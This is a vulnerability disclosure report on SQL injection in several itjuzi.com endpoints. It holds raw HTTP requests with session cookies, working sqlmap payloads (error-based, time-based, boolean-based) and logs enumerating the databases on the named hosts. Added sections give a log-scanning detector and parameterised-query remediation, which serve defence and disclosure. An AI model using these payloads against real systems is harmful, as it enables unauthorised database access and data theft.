ITJuzi (IT桔子) multi-site SQL injection #4 (a large number of databases involved)
[HD] building network security with personal glory in the name of a team
1. Data Packets:
GET /investevents?scope=1&similar_money=2&sub_scope=75 HTTP/1.1
Cookie: cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2218155777735a8bba07cf79b317c7c235%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22218.205.17.171%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435637740%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Deea558e5acc865deaf8a977cb17317b2; BAIDU_DUP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\">()refdxss"); Hm_lvt_1c587ad486cdb6b962e94fc2002edf89=1435637252; Hm_lpvt_1c587ad486cdb6b962e94fc2002edf89=1435637252; _ga=GA1.2.1933942160.1435637253; _gat=1; bd_st=%28%7B%22s%22%3A1435637277874%2C%22r%22%3A%22http%3A//tmp.itjuzi.com/search%3Fcat%3Dcompany%26keyword%3D1%22%7D%29
Host: tmp.itjuzi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Both the scope and sub_scope parameters are injectable; scope is used for the demonstration.
Read access to the database is confirmed. With 32 databases reachable from a single injection point, the impact is wide.
GET parameter 'scope' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 1730 HTTP(s) requests:
---
Parameter: scope (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: scope=1) AND (SELECT 8906 FROM(SELECT COUNT(*),CONCAT(0x7176767871,(SELECT (ELT(8906=8906,1))),0x71706b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7451=7451&similar_money=2&sub_scope=75

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (comment)
    Payload: scope=1) AND SLEEP(5)#&similar_money=2&sub_scope=75
---
[12:48:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[12:48:14] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 7
web application technology: PHP 5.4.13, Nginx
back-end DBMS: MySQL 5.0
[12:48:14] [INFO] fetching database names
[12:48:14] [INFO] the SQL query used returns 32 entries
[12:48:14] [INFO] starting 10 threads
[12:48:15] [INFO] retrieved: information_schema
[12:48:15] [INFO] retrieved: apple_cn
[12:48:15] [INFO] retrieved: apple
[12:48:15] [INFO] retrieved: bdxzjklt
[12:48:15] [INFO] retrieved: avgouzai
[12:48:15] [INFO] retrieved: blog_chktips
[12:48:15] [INFO] retrieved: dear_there
[12:48:15] [INFO] retrieved: blogitjuzi
[12:48:15] [INFO] retrieved: cciehunhun
[12:48:15] [INFO] retrieved: dengta
[12:48:15] [INFO] retrieved: demo_chktips
[12:48:15] [INFO] retrieved: dev_yahoo
[12:48:15] [INFO] retrieved: itjuzi
[12:48:15] [INFO] retrieved: letcodefly
[12:48:15] [INFO] retrieved: itjuzidemo
[12:48:16] [INFO] retrieved: kejiju
[12:48:16] [INFO] retrieved: kids_db
[12:48:16] [INFO] retrieved: meximexi
[12:48:16] [INFO] retrieved: psdhere
[12:48:16] [INFO] retrieved: mysql
[12:48:16] [INFO] retrieved: seeker
[12:48:16] [INFO] retrieved: redmine
[12:48:16] [INFO] retrieved: sochips
[12:48:16] [INFO] retrieved: seeker_test
[12:48:16] [INFO] retrieved: ssmli
[12:48:16] [INFO] retrieved: spider_article
[12:48:16] [INFO] retrieved: test
[12:48:16] [INFO] retrieved: wp_new
[12:48:16] [INFO] retrieved: zangels
[12:48:16] [INFO] retrieved: touzishuju
[12:48:18] [INFO] retrieved: wp_new_2
[12:48:19] [INFO] retrieved: chktips
available databases [32]:
[*] apple
[*] apple_cn
[*] avgouzai
[*] bdxzjklt
[*] blog_chktips
[*] blogitjuzi
[*] cciehunhun
[*] chktips
[*] dear_there
[*] demo_chktips
[*] dengta
[*] dev_yahoo
[*] information_schema
[*] itjuzi
[*] itjuzidemo
[*] kejiju
[*] kids_db
[*] letcodefly
[*] meximexi
[*] mysql
[*] psdhere
[*] redmine
[*] seeker
[*] seeker_test
[*] sochips
[*] spider_article
[*] ssmli
[*] test
[*] touzishuju
[*] wp_new
[*] wp_new_2
[*] zangels
[12:48:20] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 2 times, 500 (Internal Server Error) - 1757 times
[12:48:20] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tmp.itjuzi.com'
2. Data Packets:
GET /invstdeal?prov=1&round=9&similar_money=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://car.itjuzi.com:80/
Cookie: csrf_cookie_name=8dd969eebfb7bcca1c2ef373d9d77f31; cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2202d64eb824a52f46b03dab17073af0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2236.250.86.185%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435636782%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Da2768b740c73761818bea540c8499ad6
Host: car.itjuzi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The prov parameter can be injected.
GET parameter 'prov' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 880 HTTP(s) requests:
---
Parameter: prov (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: prov=1'||(SELECT 'vyVA' FROM DUAL WHERE 1321=1321 RLIKE (SELECT (CASE WHEN (1420=1420) THEN 1 ELSE 0x28 END)))||'&round=9&similar_money=1
---
[13:00:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:00:23] [INFO] testing MySQL
[13:00:24] [INFO] confirming MySQL
[13:00:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL >= 5.0.0
[13:00:25] [INFO] fetching database names
[13:00:25] [INFO] fetching number of databases
[13:00:25] [INFO] retrieved: 7
[13:00:27] [INFO] retrieving the length of query output
[13:00:27] [INFO] retrieved: 18
[13:01:22] [INFO] retrieved: information_schema
[13:01:22] [INFO] retrieving the length of query output
[13:01:22] [INFO] retrieved: 10
[13:01:38] [INFO] retrieved: _logitjuzi 9/10 (90%)
[13:01:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:02:16] [INFO] retrieved: @logitjuzi
[13:02:16] [INFO] retrieving the length of query output
[13:02:16] [INFO] retrieved: 10
[13:02:34] [INFO] retrieved: cacti_prod
[13:02:34] [INFO] retrieving the length of query output
[13:02:34] [INFO] retrieved: 6
[13:02:56] [INFO] retrieved: itjuzi
[13:02:56] [INFO] retrieving the length of query output
[13:02:56] [INFO] retrieved: 5
[13:03:12] [INFO] retrieved: mysql
[13:03:12] [INFO] retrieving the length of query output
[13:03:12] [INFO] retrieved: 4
[13:03:22] [INFO] retrieved: test
[13:03:22] [INFO] retrieving the length of query output
[13:03:22] [INFO] retrieved: 10
[13:03:41] [INFO] retrieved: touzishuju
available databases [7]:
[*] @logitjuzi
[*] cacti_prod
[*] information_schema
[*] itjuzi
[*] mysql
[*] test
[*] touzishuju
[13:03:41] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 1 times, 500 (Internal Server Error) - 675 times
[13:03:41] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\car.itjuzi.com'
3. Data Packets:
GET /news?time=-1&type=13 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://car.itjuzi.com:80/
Cookie: csrf_cookie_name=8dd969eebfb7bcca1c2ef373d9d77f31; cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2202d64eb824a52f46b03dab17073af0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2236.250.86.185%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435636782%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Da2768b740c73761818bea540c8499ad6
Host: car.itjuzi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The time parameter can be injected.
I will not go into depth here.
GET parameter 'time' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 100 HTTP(s) requests:
---
Parameter: time (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: time=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))WGpt) AND 'tAGM'='tAGM&type=13
---
[13:11:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL 5.0.12
[13:11:23] [INFO] fetching database names
[13:11:23] [INFO] fetching number of databases
[13:11:23] [INFO] retrieved:
[13:11:23] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
7
[13:11:47] [INFO] retrieved:
[13:11:57] [INFO] adjusting time delay to 4 seconds due to good response times
informatio
4. URL: http://tmp.itjuzi.com:80/location?fund_status=6&id=-1&type=com
The id parameter can be injected (32 databases, root privileges).
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://tmp.itjuzi.com:80/location?id=-1" OR 3 AND (SELECT 9081 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (ELT(9081=9081,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- dfwk21=6 AND 000507=000507 --

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://tmp.itjuzi.com:80/location?id=-1" OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))lLua)-- zpXx21=6 AND 000507=000507 --
---
[13:16:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.13, Nginx
back-end DBMS: MySQL 5.0
[13:16:10] [INFO] fetching database names
[13:16:10] [WARNING] reflective value(s) found and filtering out
[13:16:10] [INFO] the SQL query used returns 32 entries
[13:16:11] [INFO] retrieved: information_schema
[13:16:11] [INFO] retrieved: apple
[13:16:11] [INFO] retrieved: apple_cn
[13:16:12] [INFO] retrieved: avgouzai
[13:16:12] [INFO] retrieved: bdxzjklt
[13:16:13] [INFO] retrieved: blog_chktips
[13:16:13] [INFO] retrieved: blogitjuzi
[13:16:13] [INFO] retrieved: cciehunhun
[13:16:14] [INFO] retrieved: chktips
[13:16:14] [INFO] retrieved: dear_there
[13:16:14] [INFO] retrieved: demo_chktips
[13:16:15] [INFO] retrieved: dengta
[13:16:15] [INFO] retrieved: dev_yahoo
[13:16:15] [INFO] retrieved: itjuzi
[13:16:16] [INFO] retrieved: itjuzidemo
[13:16:16] [INFO] retrieved: kejiju
[13:16:16] [INFO] retrieved: kids_db
[13:16:17] [INFO] retrieved: letcodefly
[13:16:17] [INFO] retrieved: meximexi
[13:16:18] [INFO] retrieved: mysql
[13:16:18] [INFO] retrieved: psdhere
[13:16:18] [INFO] retrieved: redmine
[13:16:19] [INFO] retrieved: seeker
[13:16:19] [INFO] retrieved: seeker_test
[13:16:19] [INFO] retrieved: sochips
[13:16:20] [INFO] retrieved: spider_article
[13:16:20] [INFO] retrieved: ssmli
[13:16:21] [INFO] retrieved: test
[13:16:21] [INFO] retrieved: touzishuju
[13:16:21] [INFO] retrieved: wp_new
[13:16:22] [INFO] retrieved: wp_new_2
[13:16:22] [INFO] retrieved: zangels
available databases [32]:
[*] apple
[*] apple_cn
[*] avgouzai
[*] bdxzjklt
[*] blog_chktips
[*] blogitjuzi
[*] cciehunhun
[*] chktips
[*] dear_there
[*] demo_chktips
[*] dengta
[*] dev_yahoo
[*] information_schema
[*] itjuzi
[*] itjuzidemo
[*] kejiju
[*] kids_db
[*] letcodefly
[*] meximexi
[*] mysql
[*] psdhere
[*] redmine
[*] seeker
[*] seeker_test
[*] sochips
[*] spider_article
[*] ssmli
[*] test
[*] touzishuju
[*] wp_new
[*] wp_new_2
[*] zangels
[13:16:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 35 times
[13:16:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tmp.itjuzi.com'
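The four runs above use only three payload families: the error-based duplicate-key trick (FLOOR(RAND(0)*2) with GROUP BY), time-based SLEEP(), and the RLIKE boolean probe, and each run left hundreds of HTTP 500 responses behind. The script below is an added example, not part of the original report: it parses combined-format access-log lines, URL-decodes the request target (repeatedly, so double-encoding does not hide the payload), tags each request with the family it matches, and lists clients that produced an unusual number of 500s. The log lines are constructed for the example, with the payloads taken from the sqlmap output above; the IP addresses and user-agent are made up.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlencode

# Nginx/Apache "combined" access-log line. sqlmap percent-encodes its query
# strings, so the request target never contains a raw space.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The three payload families sqlmap reported against these endpoints.
SIGNATURES = [
    ("error-based (FLOOR(RAND(0)*2) ... GROUP BY)",
     re.compile(r"FLOOR\(RAND\(0\)\*2\).*GROUP BY", re.I | re.S)),
    ("time-based blind (SLEEP)",
     re.compile(r"\bSLEEP\(\d+\)", re.I)),
    ("boolean-based blind (RLIKE)",
     re.compile(r"\bRLIKE\b", re.I)),
]


def decode_fully(target, rounds=3):
    """URL-decode repeatedly so a double-encoded payload is not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(target):
    """Name of the first payload family found in the decoded target, or None."""
    decoded = decode_fully(target)
    for name, rx in SIGNATURES:
        if rx.search(decoded):
            return name
    return None


def scan_log(lines):
    """Return [(client_ip, path, family)] for every request carrying a known payload."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        family = classify(m.group("target"))
        if family:
            findings.append((m.group("ip"), m.group("target").split("?", 1)[0], family))
    return findings


def noisy_clients(lines, status="500", threshold=3):
    """Clients that triggered `status` at least `threshold` times. The runs above
    produced 1757, 675 and 35 such errors, a signal even if payloads are obfuscated."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and m.group("status") == status:
            counts[m.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log lines (not from the report). The query strings are
# built with urlencode so the percent-encoding matches what a scanner sends.
def _line(ip, path, params, status):
    return (f'{ip} - - [30/Jun/2015:12:48:14 +0800] "GET {path}?{urlencode(params)} HTTP/1.1" '
            f'{status} 0 "-" "Mozilla/5.0"')

ATTACKER = "203.0.113.5"  # made-up scanner address
SAMPLE_LOG = [
    _line(ATTACKER, "/investevents",
          {"scope": "1) AND SLEEP(5)#", "similar_money": "2", "sub_scope": "75"}, 500),
    _line(ATTACKER, "/investevents",
          {"scope": "1) AND (SELECT 8906 FROM(SELECT COUNT(*),CONCAT(0x7176767871,"
                    "(SELECT (ELT(8906=8906,1))),0x71706b7a71,FLOOR(RAND(0)*2))x "
                    "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7451=7451",
           "similar_money": "2", "sub_scope": "75"}, 500),
    _line(ATTACKER, "/invstdeal",
          {"prov": "1'||(SELECT 'vyVA' FROM DUAL WHERE 1321=1321 RLIKE "
                   "(SELECT (CASE WHEN (1420=1420) THEN 1 ELSE 0x28 END)))||'",
           "round": "9", "similar_money": "1"}, 500),
    _line(ATTACKER, "/news",
          {"time": "-1' AND (SELECT * FROM (SELECT(SLEEP(5)))WGpt) AND 'tAGM'='tAGM",
           "type": "13"}, 500),
    _line("198.51.100.7", "/investevents",
          {"scope": "1", "similar_money": "2", "sub_scope": "75"}, 200),
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
    print(noisy_clients(SAMPLE_LOG))
```

The signatures are deliberately narrow so they do not fire on ordinary traffic; the 500-count rule is the broad one, and is what would have caught these runs even with a tamper script rewriting the payload text.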
Solution:
Filter and validate input, and stop building SQL from request parameters by string concatenation. Every injected parameter here (scope, sub_scope, prov, time, id) is numeric, so cast it to an integer, or reject the request, before it reaches the query, and pass it as a bound parameter of a prepared statement rather than interpolating it into the SQL text. The cisession and csrf_cookie_name cookies suggest a CodeIgniter application, whose query bindings ($this->db->query($sql, $binds)) and query builder escape values for you when used consistently. Also stop echoing database errors to the client in production: the error-based technique above only works because the MySQL error text comes back in the 500 response.
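As an added illustration, not code from the report or from itjuzi.com, the vulnerable pattern beside the fixed one, in Python with an in-memory SQLite table standing in for the real schema. The table, its columns and the parenthesised WHERE clause are assumptions inferred from the shape of the sqlmap payload (scope=1) AND ... AND (7451=7451), not the site's actual code; the sample rows are constructed.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the investevents data (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE investevents (id INTEGER PRIMARY KEY, scope INTEGER, "
        "sub_scope INTEGER, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO investevents (scope, sub_scope, name) VALUES (?, ?, ?)",
        [(1, 75, "event-a"), (1, 75, "event-b"), (2, 75, "event-c"), (3, 10, "event-d")],
    )
    return conn


def vulnerable_query(conn, scope, sub_scope):
    """Before: request parameters interpolated straight into the SQL text."""
    sql = (f"SELECT name FROM investevents "
           f"WHERE (scope = {scope}) AND (sub_scope = {sub_scope})")
    return [row[0] for row in conn.execute(sql)]


def bound_query(conn, scope, sub_scope):
    """Binding alone: the value travels as data and is never parsed as SQL."""
    sql = "SELECT name FROM investevents WHERE (scope = ?) AND (sub_scope = ?)"
    return [row[0] for row in conn.execute(sql, (scope, sub_scope))]


def as_int(value, name):
    """Every injected parameter in the report is numeric; refuse anything else."""
    if isinstance(value, bool) or not str(value).lstrip("-").isdigit():
        raise ValueError(f"parameter {name!r} must be an integer")
    return int(value)


def is_rejected(value):
    """True if the validator refuses `value` (exposes the failure path for checks)."""
    try:
        as_int(value, "scope")
    except ValueError:
        return True
    return False


def hardened_query(conn, scope, sub_scope):
    """After: validate the type, then bind. Either measure defeats the payload; the
    validation additionally lets the app answer 400 instead of a database error."""
    return bound_query(conn, as_int(scope, "scope"), as_int(sub_scope, "sub_scope"))


# Tautology in the same style as the report's payloads. SQLite understands the
# '-- ' comment; the '#' form in the report is MySQL-only.
PAYLOAD = "-1) OR (1=1)-- "

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(db, "1", "75"))      # legitimate request
    print(vulnerable_query(db, PAYLOAD, "75"))  # injected: every row comes back
    print(bound_query(db, PAYLOAD, "75"))       # bound: no row matches the literal string
    print(is_rejected(PAYLOAD))                 # validated: request refused
```

With interpolation the payload rewrites the WHERE clause to `(scope = -1) OR (1=1)` and comments out the rest, which is the same control sqlmap used to append its SELECT subqueries; with a bound parameter the whole string is compared against the integer column and matches nothing.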